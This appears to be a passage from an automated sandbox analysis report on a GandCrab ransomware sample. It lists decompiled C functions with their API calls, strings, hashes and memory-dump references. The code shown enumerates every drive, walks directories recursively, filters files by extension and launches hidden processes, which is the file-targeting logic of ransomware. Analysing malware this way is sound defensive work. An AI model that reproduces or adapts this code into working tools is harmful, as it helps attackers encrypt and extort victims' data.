				struct tagPAINTSTRUCT _v68;
				struct tagPAINTSTRUCT _v88;
				short _v100;
				intOrPtr _t13;
				void* _t15;
				struct HDC__* _t21;
				int _t30;

				_t13 =  *0xf4ef290; // 0x21
				asm("movdqu xmm0, [0xf4ef280]");
				_t30 = _a8;
				_v88.fErase = _t13;
				asm("movdqu [esp+0x10], xmm0");
				_t15 = _t30 - 2;
				if(_t15 == 0) {
					CreateThread(0, 0, E0F4E2AD0, 0, 0, 0);
					DestroyWindow(_a4);
					return 0xdeadbeef;
				} else {
					if(_t15 == 0xd) {
						_t21 = BeginPaint(_a4,  &_v68);
						TextOutW(_t21, 5, 5,  &_v100, lstrlenW( &_v100));
						EndPaint(_a4,  &_v88);
						return 0;
					} else {
						return DefWindowProcW(_a4, _t30, _a12, _a16);
					}
				}
			}

0x0f4e2c59
0x0f4e2c5e
0x0f4e2c66
0x0f4e2c69
0x0f4e2c70
0x0f4e2c76
0x0f4e2c79
0x0f4e2ce9
0x0f4e2cf2
0x0f4e2d01
0x0f4e2c7b
0x0f4e2c7e
0x0f4e2c9f
0x0f4e2cbd
0x0f4e2ccb
0x0f4e2cd7
0x0f4e2c80
0x0f4e2c94
0x0f4e2c94
0x0f4e2c7e

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 0F4E2C8A
BeginPaint.USER32(?,?), ref: 0F4E2C9F
lstrlenW.KERNEL32(?), ref: 0F4E2CAC
TextOutW.GDI32(00000000,00000005,00000005,?,00000000), ref: 0F4E2CBD
EndPaint.USER32(?,?), ref: 0F4E2CCB
CreateThread.KERNEL32 ref: 0F4E2CE9
DestroyWindow.USER32(?), ref: 0F4E2CF2

Strings

GandCrab!, xrefs: 0F4E2C5E

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: PaintWindow$BeginCreateDestroyProcTextThreadlstrlen
String ID: GandCrab!
API String ID: 572880375-2223329875
Opcode ID: f6d23a3ef9bc322cf254bf3354554b48a8f00e5da6a8e7c8e8fc51e0deadf3d8
Instruction ID: a96b574e4211c3c1e6956dc53ea1120e3a3b970d48fecbe689345762364cd0ca
Opcode Fuzzy Hash: f6d23a3ef9bc322cf254bf3354554b48a8f00e5da6a8e7c8e8fc51e0deadf3d8
Instruction Fuzzy Hash: 9B11B232504209ABD711DF68EC09FEA7FACFB48322F00061AFD41DA191E7B59A24DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E3FF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F4E3FF0(struct _SECURITY_ATTRIBUTES* __ecx) {
				char _v612;
				char _v644;
				void* _v908;
				void* _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				short _v924;
				signed int _v928;
				void* _v932;
				void* _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				long _v952;
				struct _SECURITY_ATTRIBUTES* _v956;
				struct _SECURITY_ATTRIBUTES* _v960;
				struct _SECURITY_ATTRIBUTES* _v964;
				char _v968;
				void* _t67;
				short _t68;
				intOrPtr _t69;
				int _t72;
				long _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr* _t82;
				void* _t84;
				struct _SECURITY_ATTRIBUTES* _t87;
				long _t88;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t95;
				char _t101;
				intOrPtr _t106;
				void _t110;
				struct _SECURITY_ATTRIBUTES** _t114;
				intOrPtr _t115;
				signed int _t119;
				void* _t121;

				_t121 = (_t119 & 0xfffffff8) - 0x3c4;
				_t87 = __ecx;
				_v964 = __ecx;
				_t67 = VirtualAlloc(0, 0x18, 0x3000, 4);
				 *((intOrPtr*)(_t67 + 4)) = _t87;
				_t88 = 0;
				 *_t67 = 0x43;
				_t68 =  *L"?:\\"; // 0x3a003f
				_v924 = _t68;
				_t69 =  *0xf4ef350; // 0x5c
				_v920 = _t69;
				_v968 = GetTickCount();
				_t114 =  &_v644;
				_t110 = 0x41;
				do {
					_v924 = _t110;
					_t72 = GetDriveTypeW( &_v924);
					if(_t72 >= 2 && _t72 != 5) {
						 *((intOrPtr*)(_t114 - 4)) = _v964;
						_t84 = _t114 - 8;
						 *_t84 = _t110;
						 *_t114 = 0;
						_t114[2] = 0;
						_t114[3] = 0;
						 *((intOrPtr*)(_t121 + 0x48 + _t88 * 4)) = CreateThread(0, 0, E0F4E6F40, _t84, 0, 0);
						_t88 = _t88 + 1;
						_t114 =  &(_t114[6]);
					}
					_t110 = _t110 + 1;
				} while (_t110 <= 0x5a);
				_v952 = _t88;
				asm("xorps xmm0, xmm0");
				_v956 = 0;
				_v960 = 0;
				asm("movlpd [esp+0x38], xmm0");
				asm("movlpd [esp+0x30], xmm0");
				WaitForMultipleObjects(_t88,  &_v908, 1, 0xffffffff);
				_t75 = GetTickCount();
				asm("xorps xmm0, xmm0");
				_t115 = _v948;
				_v932 = _t75 - _v968;
				_t77 = 0;
				_v964 = 0;
				asm("movlpd [esp+0x40], xmm0");
				if(_t88 < 2) {
					_t95 = _v940;
					_t106 = _v944;
				} else {
					_t26 = _t88 - 2; // -1
					_t92 = _v940;
					_t82 =  &_v612;
					_t101 = (_t26 >> 1) + 1;
					_v968 = _t101;
					_v928 = _t101 + _t101;
					_t106 = _v944;
					do {
						_t92 = _t92 +  *((intOrPtr*)(_t82 - 0x18));
						_v956 = _v956 +  *((intOrPtr*)(_t82 - 0x20));
						asm("adc edi, [eax-0x14]");
						_t115 = _t115 +  *_t82;
						_v960 = _v960 +  *((intOrPtr*)(_t82 - 8));
						asm("adc edx, [eax+0x4]");
						_t82 = _t82 + 0x30;
						_t41 =  &_v968;
						 *_t41 = _v968 - 1;
					} while ( *_t41 != 0);
					_t77 = _v928;
					_v968 = _t92;
					_t88 = _v952;
					_t95 = _v968;
				}
				if(_t77 >= _t88) {
					_t89 = _v916;
				} else {
					_t80 = _t77 + _t77 * 2;
					_v964 =  *((intOrPtr*)(_t121 + 0x150 + _t80 * 8));
					_t89 =  *((intOrPtr*)(_t121 + 0x158 + _t80 * 8));
				}
				asm("adc edx, edi");
				asm("adc edx, eax");
				return E0F4E5670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0f4e3ff6
0x0f4e4008
0x0f4e400c
0x0f4e4010
0x0f4e401b
0x0f4e401e
0x0f4e4020
0x0f4e4023
0x0f4e4028
0x0f4e402c
0x0f4e4031
0x0f4e403b
0x0f4e403f
0x0f4e4046
0x0f4e4050
0x0f4e4054
0x0f4e405a
0x0f4e4063
0x0f4e4072
0x0f4e4075
0x0f4e4082
0x0f4e4085
0x0f4e408b
0x0f4e4092
0x0f4e409f
0x0f4e40a3
0x0f4e40a4
0x0f4e40a4
0x0f4e40a7
0x0f4e40a8
0x0f4e40b6
0x0f4e40ba
0x0f4e40bd
0x0f4e40c7
0x0f4e40cf
0x0f4e40d5
0x0f4e40db
0x0f4e40e1
0x0f4e40eb
0x0f4e40f2
0x0f4e40f6
0x0f4e40fa
0x0f4e40fc
0x0f4e4104
0x0f4e410d
0x0f4e416c
0x0f4e4170
0x0f4e410f
0x0f4e410f
0x0f4e4112
0x0f4e4118
0x0f4e411f
0x0f4e4120
0x0f4e4127
0x0f4e412b
0x0f4e4130
0x0f4e4137
0x0f4e413a
0x0f4e413e
0x0f4e4148
0x0f4e414a
0x0f4e414e
0x0f4e4151
0x0f4e4154
0x0f4e4154
0x0f4e4154
0x0f4e415a
0x0f4e415e
0x0f4e4162
0x0f4e4166
0x0f4e4166
0x0f4e4176
0x0f4e419a
0x0f4e4178
0x0f4e4178
0x0f4e4182
0x0f4e4186
0x0f4e418d
0x0f4e41a4
0x0f4e41a8
0x0f4e41c6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F4E4010
GetTickCount.KERNEL32 ref: 0F4E4035
GetDriveTypeW.KERNEL32(?), ref: 0F4E405A
CreateThread.KERNEL32 ref: 0F4E4099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F4E40DB
GetTickCount.KERNEL32 ref: 0F4E40E1

Strings

?:\, xrefs: 0F4E4023

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 9f12618609d4f8ef8087f662829ad10f13ef511742ba43ac35c0b6790c17f8ac
Instruction ID: 2b840662f600536dfabc2b1c5d28a83b6c2230ea055b1b7dbc611d369d83e0a3
Opcode Fuzzy Hash: 9f12618609d4f8ef8087f662829ad10f13ef511742ba43ac35c0b6790c17f8ac
Instruction Fuzzy Hash: 205125749083009FC310CF18D888B5AFBE5FF89325F504A2EF9899B3A1D375A944CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E6F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F4E6DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0f4e6f59
0x0f4e6f5f
0x0f4e6f6e
0x0f4e6f7c
0x0f4e6f90
0x0f4e6f98
0x0f4e6fa0
0x0f4e6fa8
0x0f4e6fb6
0x0f4e6fcb
0x0f4e6fdb
0x0f4e6fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F4E6F59
wsprintfW.USER32 ref: 0F4E6F6E
InitializeCriticalSection.KERNEL32(?), ref: 0F4E6F7C
VirtualAlloc.KERNEL32 ref: 0F4E6FB0

Part of subcall function 0F4E6DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F4E6E23
Part of subcall function 0F4E6DF0: lstrcatW.KERNEL32(00000000,0F4EFF44), ref: 0F4E6E3B
Part of subcall function 0F4E6DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F4E6E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F4E6FDB
ExitThread.KERNEL32 ref: 0F4E6FE3

Strings

%c:\, xrefs: 0F4E6F68

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: ad585a98df0ba7f42256262a38132017047ccb06e30e2c2de8fde95e3dfc28a9
Instruction ID: 8b2fb59f0af96e448017ce0ece78125a43080582749e82458f1e8be3dc2fae22
Opcode Fuzzy Hash: ad585a98df0ba7f42256262a38132017047ccb06e30e2c2de8fde95e3dfc28a9
Instruction Fuzzy Hash: 970196B5144300BBE710DF54CC8AF577FA9AB44B22F004615FF659E1C2D7B89514CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E69B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F4E69B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf4f2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf4f2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0f4e69b3
0x0f4e69bc
0x0f4e69be
0x0f4e69d2
0x0f4e69d7
0x0f4e69dc
0x0f4e69f0
0x0f4e69fa
0x0f4e69e0
0x0f4e69e0
0x0f4e69e6
0x0f4e69e9
0x0f4e69ea
0x00000000
0x00000000
0x00000000
0x0f4e69ea
0x0f4e69ee
0x0f4e6a17
0x0f4e6a1f
0x0f4e6a25
0x0f4e6a2b
0x0f4e6a30
0x0f4e6a36
0x0f4e6a82
0x0f4e6a89
0x0f4e6a8c
0x0f4e6a38
0x0f4e6a38
0x0f4e6a3e
0x0f4e6a42
0x0f4e6a44
0x0f4e6a44
0x0f4e6a49
0x0f4e6a69
0x0f4e6a6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e6a4b
0x0f4e6a50
0x0f4e6a50
0x0f4e6a56
0x00000000
0x00000000
0x0f4e6a5c
0x0f4e6a5e
0x00000000
0x0f4e6a60
0x0f4e6a60
0x0f4e6a67
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e6a67
0x00000000
0x0f4e6a5e
0x0f4e6a80
0x0f4e6a80
0x00000000
0x0f4e6a80
0x00000000
0x0f4e6a6f
0x0f4e6a6f
0x0f4e6a73
0x0f4e6a76
0x0f4e6a79
0x0f4e6a7e
0x0f4e6a3e
0x0f4e6a8f
0x0f4e6a97
0x0f4e6aa6
0x00000000
0x00000000
0x00000000
0x0f4e69ee
0x0f4e69c0
0x0f4e69c9
0x0f4e69c9

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F4E6AEA), ref: 0F4E69D2

Strings

%s , xrefs: 0F4E6A19

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: 9fc773ec699abace93188910928b4424dab1489df9c69f3bcb6dd0325387af86
Instruction ID: 04a930ee9c1161da4fd416e5eafe075980ef6c7a60881655225402f63de28f5a
Opcode Fuzzy Hash: 9fc773ec699abace93188910928b4424dab1489df9c69f3bcb6dd0325387af86
Instruction Fuzzy Hash: 9D210A72E1122597D7309B1C9C003F773E9EBA5323F468267EC4A8B381E7B56E5182D0

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E4E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F4E4E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F4E9170( &_v92, 0, 0x44);
				_t15 =  *0xf4f2a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf4f2a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0f4e4e1c
0x0f4e4e22
0x0f4e4e24
0x0f4e4e29
0x0f4e4e2e
0x0f4e4e36
0x0f4e4e39
0x0f4e4e3c
0x0f4e4e41
0x0f4e4e48
0x0f4e4e4d
0x0f4e4e58
0x0f4e4e77
0x0f4e4e8d
0x0f4e4e98
0x0f4e4e79
0x0f4e4e83
0x0f4e4e83

APIs

_memset.LIBCMT ref: 0F4E4E29
CreateProcessW.KERNEL32 ref: 0F4E4E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0F4E4E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F4E4E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F4E4E92

Strings

D, xrefs: 0F4E4E58

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 61117d7fa90bd4e40e5183e14a9aa189a6ad89393f697f4c13e1a55027018f27
Instruction ID: 3c23cc4aa035135d7bef6ae79405d8f7eed6b3c0b1c1bf41e26348a04af26ac1
Opcode Fuzzy Hash: 61117d7fa90bd4e40e5183e14a9aa189a6ad89393f697f4c13e1a55027018f27
Instruction Fuzzy Hash: E3014471E40318ABDB20DFA5DC45BDEBFB8EF08725F100156FA08FA180E7B525648B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0F4E6E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0F4E6AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F4E6DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0f4e6e70
0x0f4e6e84
0x0f4e6ea8
0x0f4e6eb1
0x0f4e6ee2
0x0f4e6eed
0x0f4e6eef
0x0f4e6ef2
0x0f4e6ef5
0x0f4e6ef7
0x0f4e6f00
0x0f4e6f00
0x0f4e6f03
0x0f4e6f03
0x0f4e6ef9
0x0f4e6efc
0x0f4e6efe
0x00000000
0x00000000
0x0f4e6efe
0x0f4e6ef7
0x0f4e6eb3
0x0f4e6ec7
0x0f4e6ecc
0x0f4e6f10
0x0f4e6f10
0x0f4e6f23
0x0f4e6f2e
0x0f4e6f3c

APIs

lstrcmpW.KERNEL32(?,0F4EFF48,?,?), ref: 0F4E6E7C
lstrcmpW.KERNEL32(?,0F4EFF4C,?,?), ref: 0F4E6E96
lstrcatW.KERNEL32(00000000,?), ref: 0F4E6EA8
lstrcatW.KERNEL32(00000000,0F4EFF7C), ref: 0F4E6EB9

Part of subcall function 0F4E6DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F4E6E23
Part of subcall function 0F4E6DF0: lstrcatW.KERNEL32(00000000,0F4EFF44), ref: 0F4E6E3B
Part of subcall function 0F4E6DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F4E6E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F4E6F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F4E6F2E

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 48ac412f7e98324d857c7152a8c5a395a41f732da3e03beadde2104efe1e2dbc
Instruction ID: b0643b4190e93b65021d828d01f758ef498e57d53b37682da25dd1f04e61e028
Opcode Fuzzy Hash: 48ac412f7e98324d857c7152a8c5a395a41f732da3e03beadde2104efe1e2dbc
Instruction Fuzzy Hash: 9E016931A0020DABCF21AE60DC48BEEBBB8EF04212F0040A7FD05D6152EB359A55DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E33E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F4E33E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F4E32B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F4E3320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F4E3190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F4E3200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0f4e33e3
0x0f4e33e5
0x0f4e33e9
0x0f4e33eb
0x0f4e33ee
0x0f4e33f1
0x0f4e33f8
0x0f4e34db
0x0f4e34db
0x0f4e3410
0x0f4e3425
0x0f4e342b
0x0f4e342f
0x00000000
0x0f4e3431
0x0f4e3432
0x0f4e3434
0x0f4e343a
0x0f4e3441
0x0f4e3444
0x0f4e344a
0x0f4e344b
0x0f4e34ba
0x0f4e344d
0x0f4e344e
0x0f4e3450
0x0f4e3452
0x0f4e3456
0x0f4e3467
0x0f4e3467
0x0f4e346b
0x0f4e346d
0x0f4e3471
0x0f4e3473
0x0f4e3478
0x0f4e347c
0x00000000
0x00000000
0x0f4e347e
0x00000000
0x0f4e347c
0x0f4e3480
0x0f4e3480
0x0f4e3483
0x0f4e3484
0x0f4e3495
0x0f4e349e
0x0f4e34a3
0x0f4e34a7
0x0f4e34a7
0x0f4e34ad
0x0f4e34b0
0x0f4e34b0
0x00000000
0x0f4e3458
0x0f4e345c
0x0f4e345f
0x00000000
0x0f4e3461
0x0f4e3461
0x0f4e3465
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e3465
0x00000000
0x0f4e345f
0x0f4e3458
0x0f4e3456
0x0f4e344e
0x0f4e344b
0x0f4e3444
0x0f4e34bf
0x0f4e34bf
0x0f4e34bf
0x0f4e34c2
0x0f4e34c3
0x0f4e34d6
0x0f4e34d6
0x0f4e3412
0x0f4e3412
0x0f4e3418
0x0f4e3422
0x0f4e3422

APIs

Part of subcall function 0F4E32B0: lstrlenA.KERNEL32(?,00000000,?,0F4E5444,?,?,0F4E33F6,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E32C5
Part of subcall function 0F4E32B0: lstrlenA.KERNEL32(?,?,0F4E33F6,00000000,00000000,?,?,0F4E5444,00000000,?,?,?,?,0F4E5615,00000000,popkadurak), ref: 0F4E32EE

